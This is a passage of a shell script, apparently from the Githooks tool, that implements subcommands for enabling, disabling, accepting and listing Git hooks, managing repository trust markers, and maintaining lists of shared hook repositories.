HOOK_PATH=$(cd "$HOOK_DIR" && pwd)/"$HOOK_NAME"
fi
elif [ -f ".githooks/$1" ]; then
HOOK_PATH=$(cd .githooks && pwd)/"$1"
else
for HOOK_DIR in .githooks/*; do
HOOK_ITEM=$(basename "$HOOK_DIR")
if [ "$HOOK_ITEM" = "$1" ]; then
HOOK_PATH=$(cd "$HOOK_DIR" && pwd)
fi
if [ ! -d "$HOOK_DIR" ]; then
continue
fi
HOOK_DIR=$(cd "$HOOK_DIR" && pwd)
IFS="$IFS_NEWLINE"
for HOOK_FILE in "$HOOK_DIR"/*; do
unset IFS
HOOK_ITEM=$(basename "$HOOK_FILE")
if [ "$HOOK_ITEM" = "$1" ]; then
HOOK_PATH="$HOOK_FILE"
fi
IFS="$IFS_NEWLINE"
done
done
fi
fi
if [ -z "$HOOK_PATH" ]; then
echo "! Sorry, cannot find any hooks that would match that" >&2
return 1
elif echo "$HOOK_PATH" | grep -F -qv "/.githooks"; then
if [ -d "$HOOK_PATH/.githooks" ]; then
HOOK_PATH="$HOOK_PATH/.githooks"
else
echo "! Sorry, cannot find any hooks that would match that" >&2
return 1
fi
fi
}
#####################################################
# Creates the Githooks checksum file
# for the repository if it does not exist yet.
#####################################################
ensure_checksum_file_exists() {
touch "${CURRENT_GIT_DIR}/.githooks.checksum"
}
#####################################################
# Disables one or more hook files
# in the current repository.
#
# Returns:
# 1 if the current directory is not a Git repo,
# 0 otherwise
#####################################################
disable_hook() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks disable [--shared] [trigger] [hook-script]
git hooks disable [--shared] [hook-script]
git hooks disable [--shared] [trigger]
git hooks disable [-a|--all]
git hooks disable [-r|--reset]
Disables a hook in the current repository.
The \`trigger\` parameter should be the name of the Git event if given.
The \`hook-script\` can be the name of the file to disable, or its
relative path, or an absolute path, we will try to find it.
If the \`--shared\` parameter is given as the first argument,
hooks in the shared repositories will be disabled,
otherwise they are looked up in the current local repository.
The \`--all\` parameter on its own will disable running any Githooks
in the current repository, both existing ones and any future hooks.
The \`--reset\` parameter is used to undo this, and let hooks run again.
"
return
fi
if ! is_running_in_git_repo_root; then
echo "! The current directory \`$(pwd)\` does not seem" >&2
echo " to be the root of a Git repository!" >&2
exit 1
fi
if [ "$1" = "-a" ] || [ "$1" = "--all" ]; then
git config githooks.disable true &&
echo "All existing and future hooks are disabled in the current repository" &&
return
echo "! Failed to disable hooks in the current repository" >&2
exit 1
elif [ "$1" = "-r" ] || [ "$1" = "--reset" ]; then
git config --unset githooks.disable
if ! git config --get githooks.disable; then
echo "Githooks hook files are not disabled anymore by default" && return
else
echo "! Failed to re-enable Githooks hook files" >&2
exit 1
fi
fi
if ! find_hook_path_to_enable_or_disable "$@"; then
if [ "$1" = "update" ]; then
echo " Did you mean \`git hooks update disable\` ?"
fi
exit 1
fi
ensure_checksum_file_exists
find "$HOOK_PATH" -type f -path "*/.githooks/*" | while IFS= read -r HOOK_FILE; do
if grep -q "disabled> $HOOK_FILE" "${CURRENT_GIT_DIR}/.githooks.checksum" 2>/dev/null; then
echo "Hook file is already disabled at $HOOK_FILE"
continue
fi
echo "disabled> $HOOK_FILE" >>"${CURRENT_GIT_DIR}/.githooks.checksum"
echo "Hook file disabled at $HOOK_FILE"
done
}
#####################################################
# Enables one or more hook files
# in the current repository.
#
# Returns:
# 1 if the current directory is not a Git repo,
# 0 otherwise
#####################################################
enable_hook() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks enable [--shared] [trigger] [hook-script]
git hooks enable [--shared] [hook-script]
git hooks enable [--shared] [trigger]
Enables a hook or hooks in the current repository.
The \`trigger\` parameter should be the name of the Git event if given.
The \`hook-script\` can be the name of the file to enable, or its
relative path, or an absolute path, we will try to find it.
If the \`--shared\` parameter is given as the first argument,
hooks in the shared repositories will be enabled,
otherwise they are looked up in the current local repository.
"
return
fi
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
if ! find_hook_path_to_enable_or_disable "$@"; then
if [ "$1" = "update" ]; then
echo " Did you mean \`git hooks update enable\` ?"
fi
exit 1
fi
ensure_checksum_file_exists
sed "\\|disabled> $HOOK_PATH|d" "${CURRENT_GIT_DIR}/.githooks.checksum" >"${CURRENT_GIT_DIR}/.githooks.checksum.tmp" &&
mv "${CURRENT_GIT_DIR}/.githooks.checksum.tmp" "${CURRENT_GIT_DIR}/.githooks.checksum" &&
echo "Hook file(s) enabled at $HOOK_PATH"
}
#####################################################
# Accept changes to a new or existing but changed
# hook file by recording its checksum as accepted.
#
# Returns:
# 1 if the current directory is not a Git repo,
# 0 otherwise
#####################################################
accept_changes() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks accept [--shared] [trigger] [hook-script]
git hooks accept [--shared] [hook-script]
git hooks accept [--shared] [trigger]
Accepts a new hook or changes to an existing hook.
The \`trigger\` parameter should be the name of the Git event if given.
The \`hook-script\` can be the name of the file to enable, or its
relative path, or an absolute path, we will try to find it.
If the \`--shared\` parameter is given as the first argument,
hooks in the shared repositories will be accepted,
otherwise they are looked up in the current local repository.
"
return
fi
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
find_hook_path_to_enable_or_disable "$@" || exit 1
ensure_checksum_file_exists
find "$HOOK_PATH" -type f -path "*/.githooks/*" | while IFS= read -r HOOK_FILE; do
if grep -q "disabled> $HOOK_FILE" "${CURRENT_GIT_DIR}/.githooks.checksum"; then
echo "Hook file is currently disabled at $HOOK_FILE"
continue
fi
CHECKSUM=$(get_hook_checksum "$HOOK_FILE")
echo "$CHECKSUM $HOOK_FILE" >>"${CURRENT_GIT_DIR}/.githooks.checksum" &&
echo "Changes accepted for $HOOK_FILE"
done
}
#####################################################
# Returns the SHA1 hash of the hook file
# passed in as the first argument.
#####################################################
get_hook_checksum() {
git hash-object "$1" 2>/dev/null
}
#####################################################
# Manage settings related to trusted repositories.
# It allows setting up and clearing marker
# files and Git configuration.
#
# Returns:
# 1 on failure, 0 otherwise
#####################################################
manage_trusted_repo() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks trust
git hooks trust [revoke]
git hooks trust [delete]
git hooks trust [forget]
Sets up, or reverts the trusted setting for the local repository.
When called without arguments, it marks the local repository as trusted.
The \`revoke\` argument resets the already accepted trust setting,
and the \`delete\` argument also deletes the trusted marker.
The \`forget\` option unsets the trust setting, asking for accepting
it again next time, if the repository is marked as trusted.
"
return
fi
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
if [ -z "$1" ]; then
mkdir -p .githooks &&
touch .githooks/trust-all &&
git config githooks.trust.all Y &&
echo "The current repository is now trusted." &&
echo_if_non_bare_repo " Do not forget to commit and push the trust marker!" &&
return
echo "! Failed to mark the current repository as trusted" >&2
exit 1
fi
if [ "$1" = "forget" ]; then
if [ -z "$(git config --local --get githooks.trust.all)" ]; then
echo "The current repository does not have trust settings."
return
elif git config --unset githooks.trust.all; then
echo "The current repository is no longer trusted."
return
else
echo "! Failed to revoke the trusted setting" >&2
exit 1
fi
elif [ "$1" = "revoke" ] || [ "$1" = "delete" ]; then
if git config githooks.trust.all N; then
echo "The current repository is no longer trusted."
else
echo "! Failed to revoke the trusted setting" >&2
exit 1
fi
if [ "$1" = "revoke" ]; then
return
fi
fi
if [ "$1" = "delete" ] || [ -f .githooks/trust-all ]; then
rm -rf .githooks/trust-all &&
echo "The trust marker is removed from the repository." &&
echo_if_non_bare_repo " Do not forget to commit and push the change!" &&
return
echo "! Failed to delete the trust marker" >&2
exit 1
fi
echo "! Unknown subcommand: $1" >&2
echo " Run \`git hooks trust help\` to see the available options." >&2
exit 1
}
#####################################################
# Checks if Githhoks is set up correctly,
# and that other git settings do not prevent it
# from executing scripts.
#####################################################
check_git_hooks_setup_is_correct() {
if [ -n "$(git config core.hooksPath)" ]; then
if [ "true" != "$(git config githooks.useCoreHooksPath)" ]; then
echo "! WARNING" >&2
echo " \`git config core.hooksPath\` is set to $(git config core.hooksPath)," >&2
echo " but Githooks is not configured to use that folder," >&2
echo " which could mean the hooks in this repository are not run by Githooks" >&2
echo >&2
fi
else
if [ "true" = "$(git config githooks.useCoreHooksPath)" ]; then
echo "! WARNING" >&2
echo " Githooks is configured to consider \`git config core.hooksPath\`," >&2
echo " but that git setting is not currently set," >&2
echo " which could mean the hooks in this repository are not run by Githooks" >&2
echo >&2
fi
fi
}
#####################################################
# Lists the hook files in the current
# repository along with their current state.
#
# Returns:
# 1 if the current directory is not a Git repo,
# 0 otherwise
#####################################################
list_hooks() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks list [type]
Lists the active hooks in the current repository along with their state.
If \`type\` is given, then it only lists the hooks for that trigger event.
This command needs to be run at the root of a repository.
"
return
fi
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
check_git_hooks_setup_is_correct
if [ -n "$*" ]; then
LIST_TYPES="$*"
WARN_NOT_FOUND="1"
else
LIST_TYPES="
applypatch-msg pre-applypatch post-applypatch
pre-commit prepare-commit-msg commit-msg post-commit
pre-rebase post-checkout post-merge pre-push
pre-receive update post-receive post-update
push-to-checkout pre-auto-gc post-rewrite sendemail-validate"
fi
for LIST_TYPE in $LIST_TYPES; do
LIST_OUTPUT=""
# non-Githooks hook file
if [ -x "${CURRENT_GIT_DIR}/hooks/${LIST_TYPE}.replaced.githook" ]; then
ITEM_STATE=$(get_hook_state "${CURRENT_GIT_DIR}/hooks/${LIST_TYPE}.replaced.githook")
LIST_OUTPUT="$LIST_OUTPUT
- $LIST_TYPE (previous / file / ${ITEM_STATE})"
fi
# global shared hooks
SHARED_REPOS_LIST=$(git config --global --get-all githooks.shared)
IFS="$IFS_NEWLINE"
for SHARED_ITEM in $(list_hooks_in_shared_repos "$LIST_TYPE"); do
unset IFS
if [ -d "$SHARED_ITEM" ]; then
for LIST_ITEM in "$SHARED_ITEM"/*; do
ITEM_NAME=$(basename "$LIST_ITEM")
ITEM_STATE=$(get_hook_state "$LIST_ITEM")
LIST_OUTPUT="$LIST_OUTPUT
- $ITEM_NAME (${ITEM_STATE} / shared:global)"
done
elif [ -f "$SHARED_ITEM" ]; then
ITEM_STATE=$(get_hook_state "$SHARED_ITEM")
LIST_OUTPUT="$LIST_OUTPUT
- $LIST_TYPE (file / ${ITEM_STATE} / shared:global)"
fi
IFS="$IFS_NEWLINE"
done
# local shared hooks
if [ -f "$(pwd)/.githooks/.shared" ]; then
SHARED_REPOS_LIST=$(grep -E "^[^#\n\r ].*$" <"$(pwd)/.githooks/.shared")
IFS="$IFS_NEWLINE"
for SHARED_ITEM in $(list_hooks_in_shared_repos "$LIST_TYPE"); do
unset IFS
if [ -d "$SHARED_ITEM" ]; then
for LIST_ITEM in "$SHARED_ITEM"/*; do
ITEM_NAME=$(basename "$LIST_ITEM")
ITEM_STATE=$(get_hook_state "$LIST_ITEM")
LIST_OUTPUT="$LIST_OUTPUT
- $ITEM_NAME (${ITEM_STATE} / shared:local)"
done
elif [ -f "$SHARED_ITEM" ]; then
ITEM_STATE=$(get_hook_state "$SHARED_ITEM")
LIST_OUTPUT="$LIST_OUTPUT
- $LIST_TYPE (file / ${ITEM_STATE} / shared:local)"
fi
IFS="$IFS_NEWLINE"
done
fi
# in the current repository
if [ -d ".githooks/$LIST_TYPE" ]; then
IFS="$IFS_NEWLINE"
for LIST_ITEM in .githooks/"$LIST_TYPE"/*; do
unset IFS
ITEM_NAME=$(basename "$LIST_ITEM")
ITEM_STATE=$(get_hook_state "$(pwd)/.githooks/$LIST_TYPE/$ITEM_NAME")
LIST_OUTPUT="$LIST_OUTPUT
- $ITEM_NAME (${ITEM_STATE})"
IFS="$IFS_NEWLINE"
done
elif [ -f ".githooks/$LIST_TYPE" ]; then
ITEM_STATE=$(get_hook_state "$(pwd)/.githooks/$LIST_TYPE")
LIST_OUTPUT="$LIST_OUTPUT
- $LIST_TYPE (file / ${ITEM_STATE})"
fi
if [ -n "$LIST_OUTPUT" ]; then
echo "> ${LIST_TYPE}${LIST_OUTPUT}"
elif [ -n "$WARN_NOT_FOUND" ]; then
echo "> $LIST_TYPE"
echo " No active hooks found"
fi
done
}
#####################################################
# Returns the state of hook file
# in a human-readable format
# on the standard output.
#####################################################
get_hook_state() {
if is_repository_disabled; then
echo "disabled"
elif is_file_ignored "$1"; then
echo "ignored"
elif is_trusted_repo; then
echo "active / trusted"
else
get_hook_enabled_or_disabled_state "$1"
fi
}
#####################################################
# Checks if Githooks is disabled in the
# current local repository.
#
# Returns:
# 0 if disabled, 1 otherwise
#####################################################
is_repository_disabled() {
GITHOOKS_CONFIG_DISABLE=$(git config --get githooks.disable)
if [ "$GITHOOKS_CONFIG_DISABLE" = "true" ] ||
[ "$GITHOOKS_CONFIG_DISABLE" = "y" ] || # Legacy
[ "$GITHOOKS_CONFIG_DISABLE" = "Y" ]; then # Legacy
return 0
else
return 1
fi
}
#####################################################
# Checks if the hook file at ${HOOK_PATH}
# is ignored and should not be executed.
#
# Returns:
# 0 if ignored, 1 otherwise
#####################################################
is_file_ignored() {
HOOK_NAME=$(basename "$1")
IS_IGNORED=""
# If there are .ignore files, read the list of patterns to exclude.
ALL_IGNORE_FILE=$(mktemp)
if [ -f ".githooks/.ignore" ]; then
cat ".githooks/.ignore" >"$ALL_IGNORE_FILE"
echo >>"$ALL_IGNORE_FILE"
fi
if [ -f ".githooks/${LIST_TYPE}/.ignore" ]; then
cat ".githooks/${LIST_TYPE}/.ignore" >>"$ALL_IGNORE_FILE"
echo >>"$ALL_IGNORE_FILE"
fi
# Check if the filename matches any of the ignored patterns
while IFS= read -r IGNORED; do
if [ -z "$IGNORED" ] || [ "$IGNORED" != "${IGNORED#\#}" ]; then
continue
fi
if [ -z "${HOOK_NAME##$IGNORED}" ]; then
IS_IGNORED="y"
break
fi
done <"$ALL_IGNORE_FILE"
# Remove the temporary file
rm -f "$ALL_IGNORE_FILE"
if [ -n "$IS_IGNORED" ]; then
return 0
else
return 1
fi
}
#####################################################
# Checks whether the current repository
# is trusted, and that this is accepted.
#
# Returns:
# 0 if the repo is trusted, 1 otherwise
#####################################################
is_trusted_repo() {
if [ -f ".githooks/trust-all" ]; then
TRUST_ALL_CONFIG=$(git config --local --get githooks.trust.all)
TRUST_ALL_RESULT=$?
# shellcheck disable=SC2181
if [ $TRUST_ALL_RESULT -ne 0 ]; then
return 1
elif [ $TRUST_ALL_RESULT -eq 0 ] && [ "$TRUST_ALL_CONFIG" = "Y" ]; then
return 0
fi
fi
return 1
}
#####################################################
# Returns the enabled or disabled state
# in human-readable format for a hook file
# passed in as the first argument.
#####################################################
get_hook_enabled_or_disabled_state() {
HOOK_PATH="$1"
SHA_HASH=$(get_hook_checksum "$HOOK_PATH")
CURRENT_HASHES=$(grep "$HOOK_PATH" "${CURRENT_GIT_DIR}/.githooks.checksum" 2>/dev/null)
# check against the previous hash
if echo "$CURRENT_HASHES" | grep -q "disabled> $HOOK_PATH" >/dev/null 2>&1; then
echo "disabled"
elif ! echo "$CURRENT_HASHES" | grep -F -q "$SHA_HASH $HOOK_PATH" >/dev/null 2>&1; then
if [ -z "$CURRENT_HASHES" ]; then
echo "pending / new"
else
echo "pending / changed"
fi
else
echo "active"
fi
}
#####################################################
# List the shared hooks from the
# $INSTALL_DIR/shared directory.
#
# Returns the list of paths to the hook files
# in the shared hook repositories found locally.
#####################################################
list_hooks_in_shared_repos() {
SHARED_LIST_TYPE="$1"
ALREADY_LISTED=""
IFS="$IFS_NEWLINE"
for SHARED_REPO_ITEM in $SHARED_REPOS_LIST; do
unset IFS
set_shared_root "$SHARED_REPO_ITEM"
if [ -e "${SHARED_ROOT}/.githooks/${SHARED_LIST_TYPE}" ]; then
echo "${SHARED_ROOT}/.githooks/${SHARED_LIST_TYPE}"
elif [ -e "${SHARED_ROOT}/${SHARED_LIST_TYPE}" ]; then
echo "${SHARED_ROOT}/${SHARED_LIST_TYPE}"
fi
ALREADY_LISTED="$ALREADY_LISTED
${SHARED_ROOT}"
done
if [ ! -d "$INSTALL_DIR/shared" ]; then
return
fi
IFS="$IFS_NEWLINE"
for SHARED_ROOT in "$INSTALL_DIR/shared/"*; do
unset IFS
if [ ! -d "$SHARED_ROOT" ]; then
continue
fi
if echo "$ALREADY_LISTED" | grep -F -q "$SHARED_ROOT"; then
continue
fi
REMOTE_URL=$(git -C "$SHARED_ROOT" config --get remote.origin.url)
ACTIVE_REPO=$(echo "$SHARED_REPOS_LIST" | grep -F -o "$REMOTE_URL")
if [ "$ACTIVE_REPO" != "$REMOTE_URL" ]; then
continue
fi
if [ -e "${SHARED_ROOT}/.githooks/${SHARED_LIST_TYPE}" ]; then
echo "${SHARED_ROOT}/.githooks/${SHARED_LIST_TYPE}"
elif [ -e "${SHARED_ROOT}/${LIST_TYPE}" ]; then
echo "${SHARED_ROOT}/${LIST_TYPE}"
fi
IFS="$IFS_NEWLINE"
done
}
#####################################################
# Manages the shared hook repositories set either
# globally, or locally within the repository.
# Changes the \`githooks.shared\` global Git
# configuration, or the contents of the
# \`.githooks/.shared\` file in the local
# Git repository.
#
# Returns:
# 0 on success, 1 on failure (exit code)
#####################################################
manage_shared_hook_repos() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks shared [add|remove] [--shared|--local|--global] <git-url>
git hooks shared clear [--shared|--local|--global|--all]
git hooks shared purge
git hooks shared list [--shared|--local|--global|--all]
git hooks shared [update|pull]
Manages the shared hook repositories set either in the \`.githooks.shared\` file locally in the repository or
in the local or global Git configuration \`githooks.shared\`.
The \`add\` or \`remove\` subcommands adds or removes an item, given as \`git-url\` from the list.
If \`--local|--global\` is given, then the \`githooks.shared\` local/global Git configuration
is modified, or if the \`--shared\` option (default) is set, the \`.githooks/.shared\`
file is modified in the local repository.
The \`clear\` subcommand deletes every item on either the global or the local list,
or both when the \`--all\` option is given.
The \`purge\` subcommand deletes the shared hook repositories already pulled locally.
The \`list\` subcommand list the shared, local, global or all (default) shared hooks repositories.
The \`update\` or \`pull\` subcommands update all the shared repositories, either by
running \`git pull\` on existing ones or \`git clone\` on new ones.
"
return
fi
if [ "$1" = "update" ] || [ "$1" = "pull" ]; then
update_shared_hook_repos
return
fi
if [ "$1" = "clear" ]; then
shift
clear_shared_hook_repos "$@"
return
fi
if [ "$1" = "purge" ]; then
[ -w "$INSTALL_DIR/shared" ] &&
rm -rf "$INSTALL_DIR/shared" &&
echo "All existing shared hook repositories have been deleted locally" &&
return
echo "! Cannot delete existing shared hook repositories locally (maybe there is none)" >&2
exit 1
fi
if [ "$1" = "list" ]; then
shift
list_shared_hook_repos "$@"
return
fi
if [ "$1" = "add" ]; then
shift
add_shared_hook_repo "$@"
return
fi
if [ "$1" = "remove" ]; then
shift
remove_shared_hook_repo "$@"
return
fi
echo "! Unknown subcommand: \`$1\`" >&2
exit 1
}
#####################################################
# Adds the URL of a new shared hook repository to
# the global or local list.
#####################################################
add_shared_hook_repo() {
SET_SHARED_TYPE="--shared"
SHARED_REPO_URL=
if echo "$1" | grep -qE "\-\-(shared|local|global)"; then
SET_SHARED_TYPE="$1"
SHARED_REPO_URL="$2"
else
SHARED_REPO_URL="$1"
fi
if [ -z "$SHARED_REPO_URL" ]; then
echo "! Usage: \`git hooks shared add [--shared|--local|--global] <git-url>\`" >&2
exit 1
fi
if [ "$SET_SHARED_TYPE" != "--shared" ]; then
if [ "$SET_SHARED_TYPE" = "--local" ] && ! is_running_in_git_repo_root; then
echo "! The current directory \`$(pwd)\` does not" >&2
echo " seem to be the root of a Git repository!" >&2
exit 1
fi
git config "$SET_SHARED_TYPE" --add githooks.shared "$SHARED_REPO_URL" &&
echo "The new shared hook repository is successfully added" &&
return
echo "! Failed to add the new shared hook repository" >&2
exit 1
else
if ! is_running_in_git_repo_root; then
echo "! The current directory \`$(pwd)\` does not" >&2
echo " seem to be the root of a Git repository!" >&2
exit 1
fi
if is_local_path "$SHARED_REPO_URL" ||
is_local_url "$SHARED_REPO_URL"; then
echo "! Adding a local path:" >&2
echo " \`$SHARED_REPO_URL\`" >&2
echo " to the local shared hooks is forbidden." >&2
exit 1
fi
mkdir -p "$(pwd)/.githooks"
[ -f "$(pwd)/.githooks/.shared" ] &&
echo "" >>"$(pwd)/.githooks/.shared"
echo "# Added on $(date)" >>"$(pwd)/.githooks/.shared" &&
echo "$SHARED_REPO_URL" >>"$(pwd)/.githooks/.shared" &&
echo "The new shared hook repository is successfully added" &&
echo_if_non_bare_repo " Do not forget to commit the change!" &&
return
echo "! Failed to add the new shared hook repository" >&2
exit 1
fi
}
#####################################################
# Removes the URL of a new shared hook repository to
# the global or local list.
#####################################################
remove_shared_hook_repo() {
SET_SHARED_TYPE="--shared"
SHARED_REPO_URL=
if echo "$1" | grep -qE "\-\-(shared|local|global)"; then
SET_SHARED_TYPE="$1"
SHARED_REPO_URL="$2"
else
SHARED_REPO_URL="$1"
fi
if [ -z "$SHARED_REPO_URL" ]; then
echo "! Usage: \`git hooks shared remove [--shared|--local|--global] <git-url>\`" >&2
exit 1
fi
if [ "$SET_SHARED_TYPE" != "--shared" ]; then
if [ "$SET_SHARED_TYPE" = "--local" ] && ! is_running_in_git_repo_root; then
echo "! The current directory \`$(pwd)\` does not" >&2
echo " seem to be the root of a Git repository!" >&2
exit 1
fi
CURRENT_LIST=$(git config "$SET_SHARED_TYPE" --get-all githooks.shared)
# Unset all and add them back
git config "$SET_SHARED_TYPE" --unset-all githooks.shared
IFS="$IFS_NEWLINE"
for SHARED_REPO_ITEM in $CURRENT_LIST; do
unset IFS
if [ "$SHARED_REPO_ITEM" = "$SHARED_REPO_URL" ]; then
continue
fi
git config "$SET_SHARED_TYPE" --add githooks.shared "$SHARED_REPO_ITEM"
IFS="$IFS_NEWLINE"
done
unset IFS
echo "The list of shared hook repositories is successfully changed"
return
else
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
if [ ! -f "$(pwd)/.githooks/.shared" ]; then
echo "! No \`.githooks/.shared\` in current repository" >&2
return
fi
NEW_LIST=""
ONLY_COMMENTS="true"
IFS="$IFS_NEWLINE"
while read -r LINE || [ -n "$LINE" ]; do
unset IFS
if echo "$LINE" | grep -qE "^[^#\n\r ].*$"; then
if [ "$LINE" = "$SHARED_REPO_URL" ]; then
continue
fi
ONLY_COMMENTS="false"
elif echo "$LINE" | grep -qE "^ *[#].*$"; then
: # nothing to do for comments ...
else
: # skip empty lines
fi
if [ -z "$NEW_LIST" ]; then
NEW_LIST="$LINE"
else
NEW_LIST="${NEW_LIST}
${LINE}"
fi
IFS="$IFS_NEWLINE"
done <"$(pwd)/.githooks/.shared"
unset IFS
if [ -z "$NEW_LIST" ] || [ "$ONLY_COMMENTS" = "true" ]; then
clear_shared_hook_repos "$SET_SHARED_TYPE" && return || exit 1
fi
echo "$NEW_LIST" >"$(pwd)/.githooks/.shared" &&
echo "The list of shared hook repositories is successfully changed" &&
echo_if_non_bare_repo " Do not forget to commit the change!" &&
return
echo "! Failed to remove a shared hook repository" >&2
exit 1
fi
}
#####################################################
# Clears the list of shared hook repositories
# from the global or local list, or both.
#####################################################
clear_shared_hook_repos() {
CLEAR_GLOBAL_REPOS=""
CLEAR_LOCAL_REPOS=""
CLEAR_SHARED_REPOS=""
CLEAR_REPOS_FAILED=""
case "$1" in
"--shared")
CLEAR_SHARED_REPOS=1
;;
"--local")
CLEAR_LOCAL_REPOS=1
;;
"--global")
CLEAR_GLOBAL_REPOS=1
;;
"--all")
CLEAR_SHARED_REPOS=1
CLEAR_LOCAL_REPOS=1
CLEAR_GLOBAL_REPOS=1
;;
*)
echo "! Unknown clear option \`$1\`" >&2
echo " Usage: \`git hooks shared clear [--shared|--local|--global|--all]\`" >&2
exit 1
;;
esac
if [ -n "$CLEAR_LOCAL_REPOS" ]; then
if ! is_running_in_git_repo_root; then
echo "! The current directory \`$(pwd)\` does not" >&2
echo " seem to be the root of a Git repository!" >&2
CLEAR_REPOS_FAILED=1
else
git config --local --unset-all githooks.shared
echo "Shared hook repository list in local Git config cleared"
fi
fi
if [ -n "$CLEAR_GLOBAL_REPOS" ]; then
git config --global --unset-all githooks.shared
echo "Shared hook repository list in global Git config cleared"
fi
if [ -n "$CLEAR_SHARED_REPOS" ] && [ -f "$(pwd)/.githooks/.shared" ]; then
rm -f "$(pwd)/.githooks/.shared" &&
echo "Shared hook repository list in \".githooks/.shared\` file cleared" ||
CLEAR_REPOS_FAILED=1
fi
if [ -n "$CLEAR_REPOS_FAILED" ]; then
echo "! There were some problems clearing the shared hook repository list" >&2
exit 1
fi
}
#####################################################
# Prints the list of shared hook repositories,
# along with their Git URLs optionally, from
# the global or local list, or both.
#####################################################
list_shared_hook_repos() {
LIST_SHARED=1
LIST_CONFIGS="global,local"
for ARG in "$@"; do
case "$ARG" in
"--shared")
LIST_CONFIGS=""
;;
"--local")
LIST_CONFIGS="local"
LIST_SHARED=""
;;
"--global")
LIST_CONFIGS="global"
LIST_SHARED=""
;;
"--all") ;;
*)
echo "! Unknown list option \`$ARG\`" >&2
echo " Usage: \`git hooks shared list [--shared|--local|--global|--all]\`" >&2
exit 1
;;
esac
done
IFS=","
for LIST_CONFIG in $LIST_CONFIGS; do
unset IFS
echo "Shared hook repositories in $LIST_CONFIG Git config:"
SHARED_REPOS_LIST=$(git config "--$LIST_CONFIG" --get-all githooks.shared)
if [ -z "$SHARED_REPOS_LIST" ]; then
echo " - None"
else
IFS="$IFS_NEWLINE"
for LIST_ITEM in $SHARED_REPOS_LIST; do
unset IFS
set_shared_root "$LIST_ITEM"
LIST_ITEM_STATE="invalid"
if [ "$SHARED_REPO_IS_CLONED" = "true" ]; then
if [ -d "$SHARED_ROOT" ]; then
if [ "$(git -C "$SHARED_ROOT" config --get remote.origin.url)" = "$SHARED_REPO_CLONE_URL" ]; then
LIST_ITEM_STATE="active"
fi
else
LIST_ITEM_STATE="pending"
fi
else
[ -d "$SHARED_ROOT" ] && LIST_ITEM_STATE="active"
fi
echo " - $LIST_ITEM ($LIST_ITEM_STATE)"
IFS="$IFS_NEWLINE"
done
unset IFS
fi
IFS=","
done
unset IFS
if [ -n "$LIST_SHARED" ]; then
echo "Shared hook repositories in \`.githooks/.shared\`:"
if ! is_running_in_git_repo_root; then
echo " - Current folder does not seem to be a Git repository"
[ -z "$LIST_CONFIGS" ] && exit 1
elif [ ! -f "$(pwd)/.githooks/.shared" ]; then
echo " - None"
else
SHARED_REPOS_LIST=$(grep -E "^[^#\n\r ].*$" <"$(pwd)/.githooks/.shared")
IFS="$IFS_NEWLINE"
for LIST_ITEM in $SHARED_REPOS_LIST; do
unset IFS
set_shared_root "$LIST_ITEM"
LIST_ITEM_STATE="invalid"
if [ "$SHARED_REPO_IS_CLONED" != "true" ]; then
[ -d "$SHARED_ROOT" ] && LIST_ITEM_STATE="active"
else
if [ -d "$SHARED_ROOT" ]; then
if [ "$(git -C "$SHARED_ROOT" config --get remote.origin.url)" = "$SHARED_REPO_CLONE_URL" ]; then
LIST_ITEM_STATE="active"
fi
else
LIST_ITEM_STATE="pending"
fi
fi
echo " - $LIST_ITEM ($LIST_ITEM_STATE)"
IFS="$IFS_NEWLINE"
done
unset IFS
fi
fi
}
#####################################################
# Updates the configured shared hook repositories.
#
# Returns:
# None
#####################################################
update_shared_hook_repos() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks shared pull
Updates the shared repositories found either
in the global Git configuration, or in the
\`.githooks/.shared\` file in the local repository.
> Please use \`git hooks shared pull\` instead, this version is now deprecated.
"
return
fi
if [ -f "$(pwd)/.githooks/.shared" ]; then
SHARED_HOOKS=$(grep -E "^[^#\n\r ].*$" <"$(pwd)/.githooks/.shared")
update_shared_hooks_in --shared "$SHARED_HOOKS"
fi
SHARED_HOOKS=$(git config --local --get-all githooks.shared 2>/dev/null)
if [ -n "$SHARED_HOOKS" ]; then
update_shared_hooks_in --local "$SHARED_HOOKS"
fi
SHARED_HOOKS=$(git config --global --get-all githooks.shared)
if [ -n "$SHARED_HOOKS" ]; then
update_shared_hooks_in --global "$SHARED_HOOKS"
fi
echo "Finished"
}
#####################################################
# Check if `$1` is not a supported git clone url and
# is treated as a local path to a repository.
# See `https://tools.ietf.org/html/rfc3986#appendix-B`
# Returns: 0 if it is a local path, 1 otherwise
#####################################################
is_local_path() {
if echo "$1" | grep -Eq "^[^:/?#]+://" || # its a URL `<scheme>://...``
echo "$1" | grep -Eq "^.+@.+:.+"; then # or its a short scp syntax
return 1
fi
return 0
}
#####################################################
# Check if url `$1`is a local url, e.g `file://`.
#
# Returns: 0 if it is a local url, 1 otherwise
#####################################################
is_local_url() {
if echo "$1" | grep -iEq "^\s*file://"; then
return 0
fi
return 1
}
#####################################################
# Sets the `SHARED_ROOT` and `NORMALIZED_NAME`
# for the shared hook repo url `$1` and sets
# `SHARED_REPO_IS_CLONED` to `true` and its
# `SHARED_REPO_CLONE_URL` if is needs to get
# cloned and `SHARED_REPO_IS_LOCAL` to `true`
# if `$1` points to to a local path.
#
# Returns:
# none
#####################################################
set_shared_root() {
SHARED_ROOT=""
SHARED_REPO_CLONE_URL=""
SHARED_REPO_CLONE_BRANCH=""
SHARED_REPO_IS_LOCAL="false"
SHARED_REPO_IS_CLONED="true"
DO_SPLIT="true"
if is_local_path "$1"; then
SHARED_REPO_IS_LOCAL="true"
if is_bare_repo "$1"; then
DO_SPLIT="false"
else
# We have a local path to a non-bare repo
SHARED_REPO_IS_CLONED="false"
SHARED_ROOT="$1"
return
fi
elif is_local_url "$1"; then
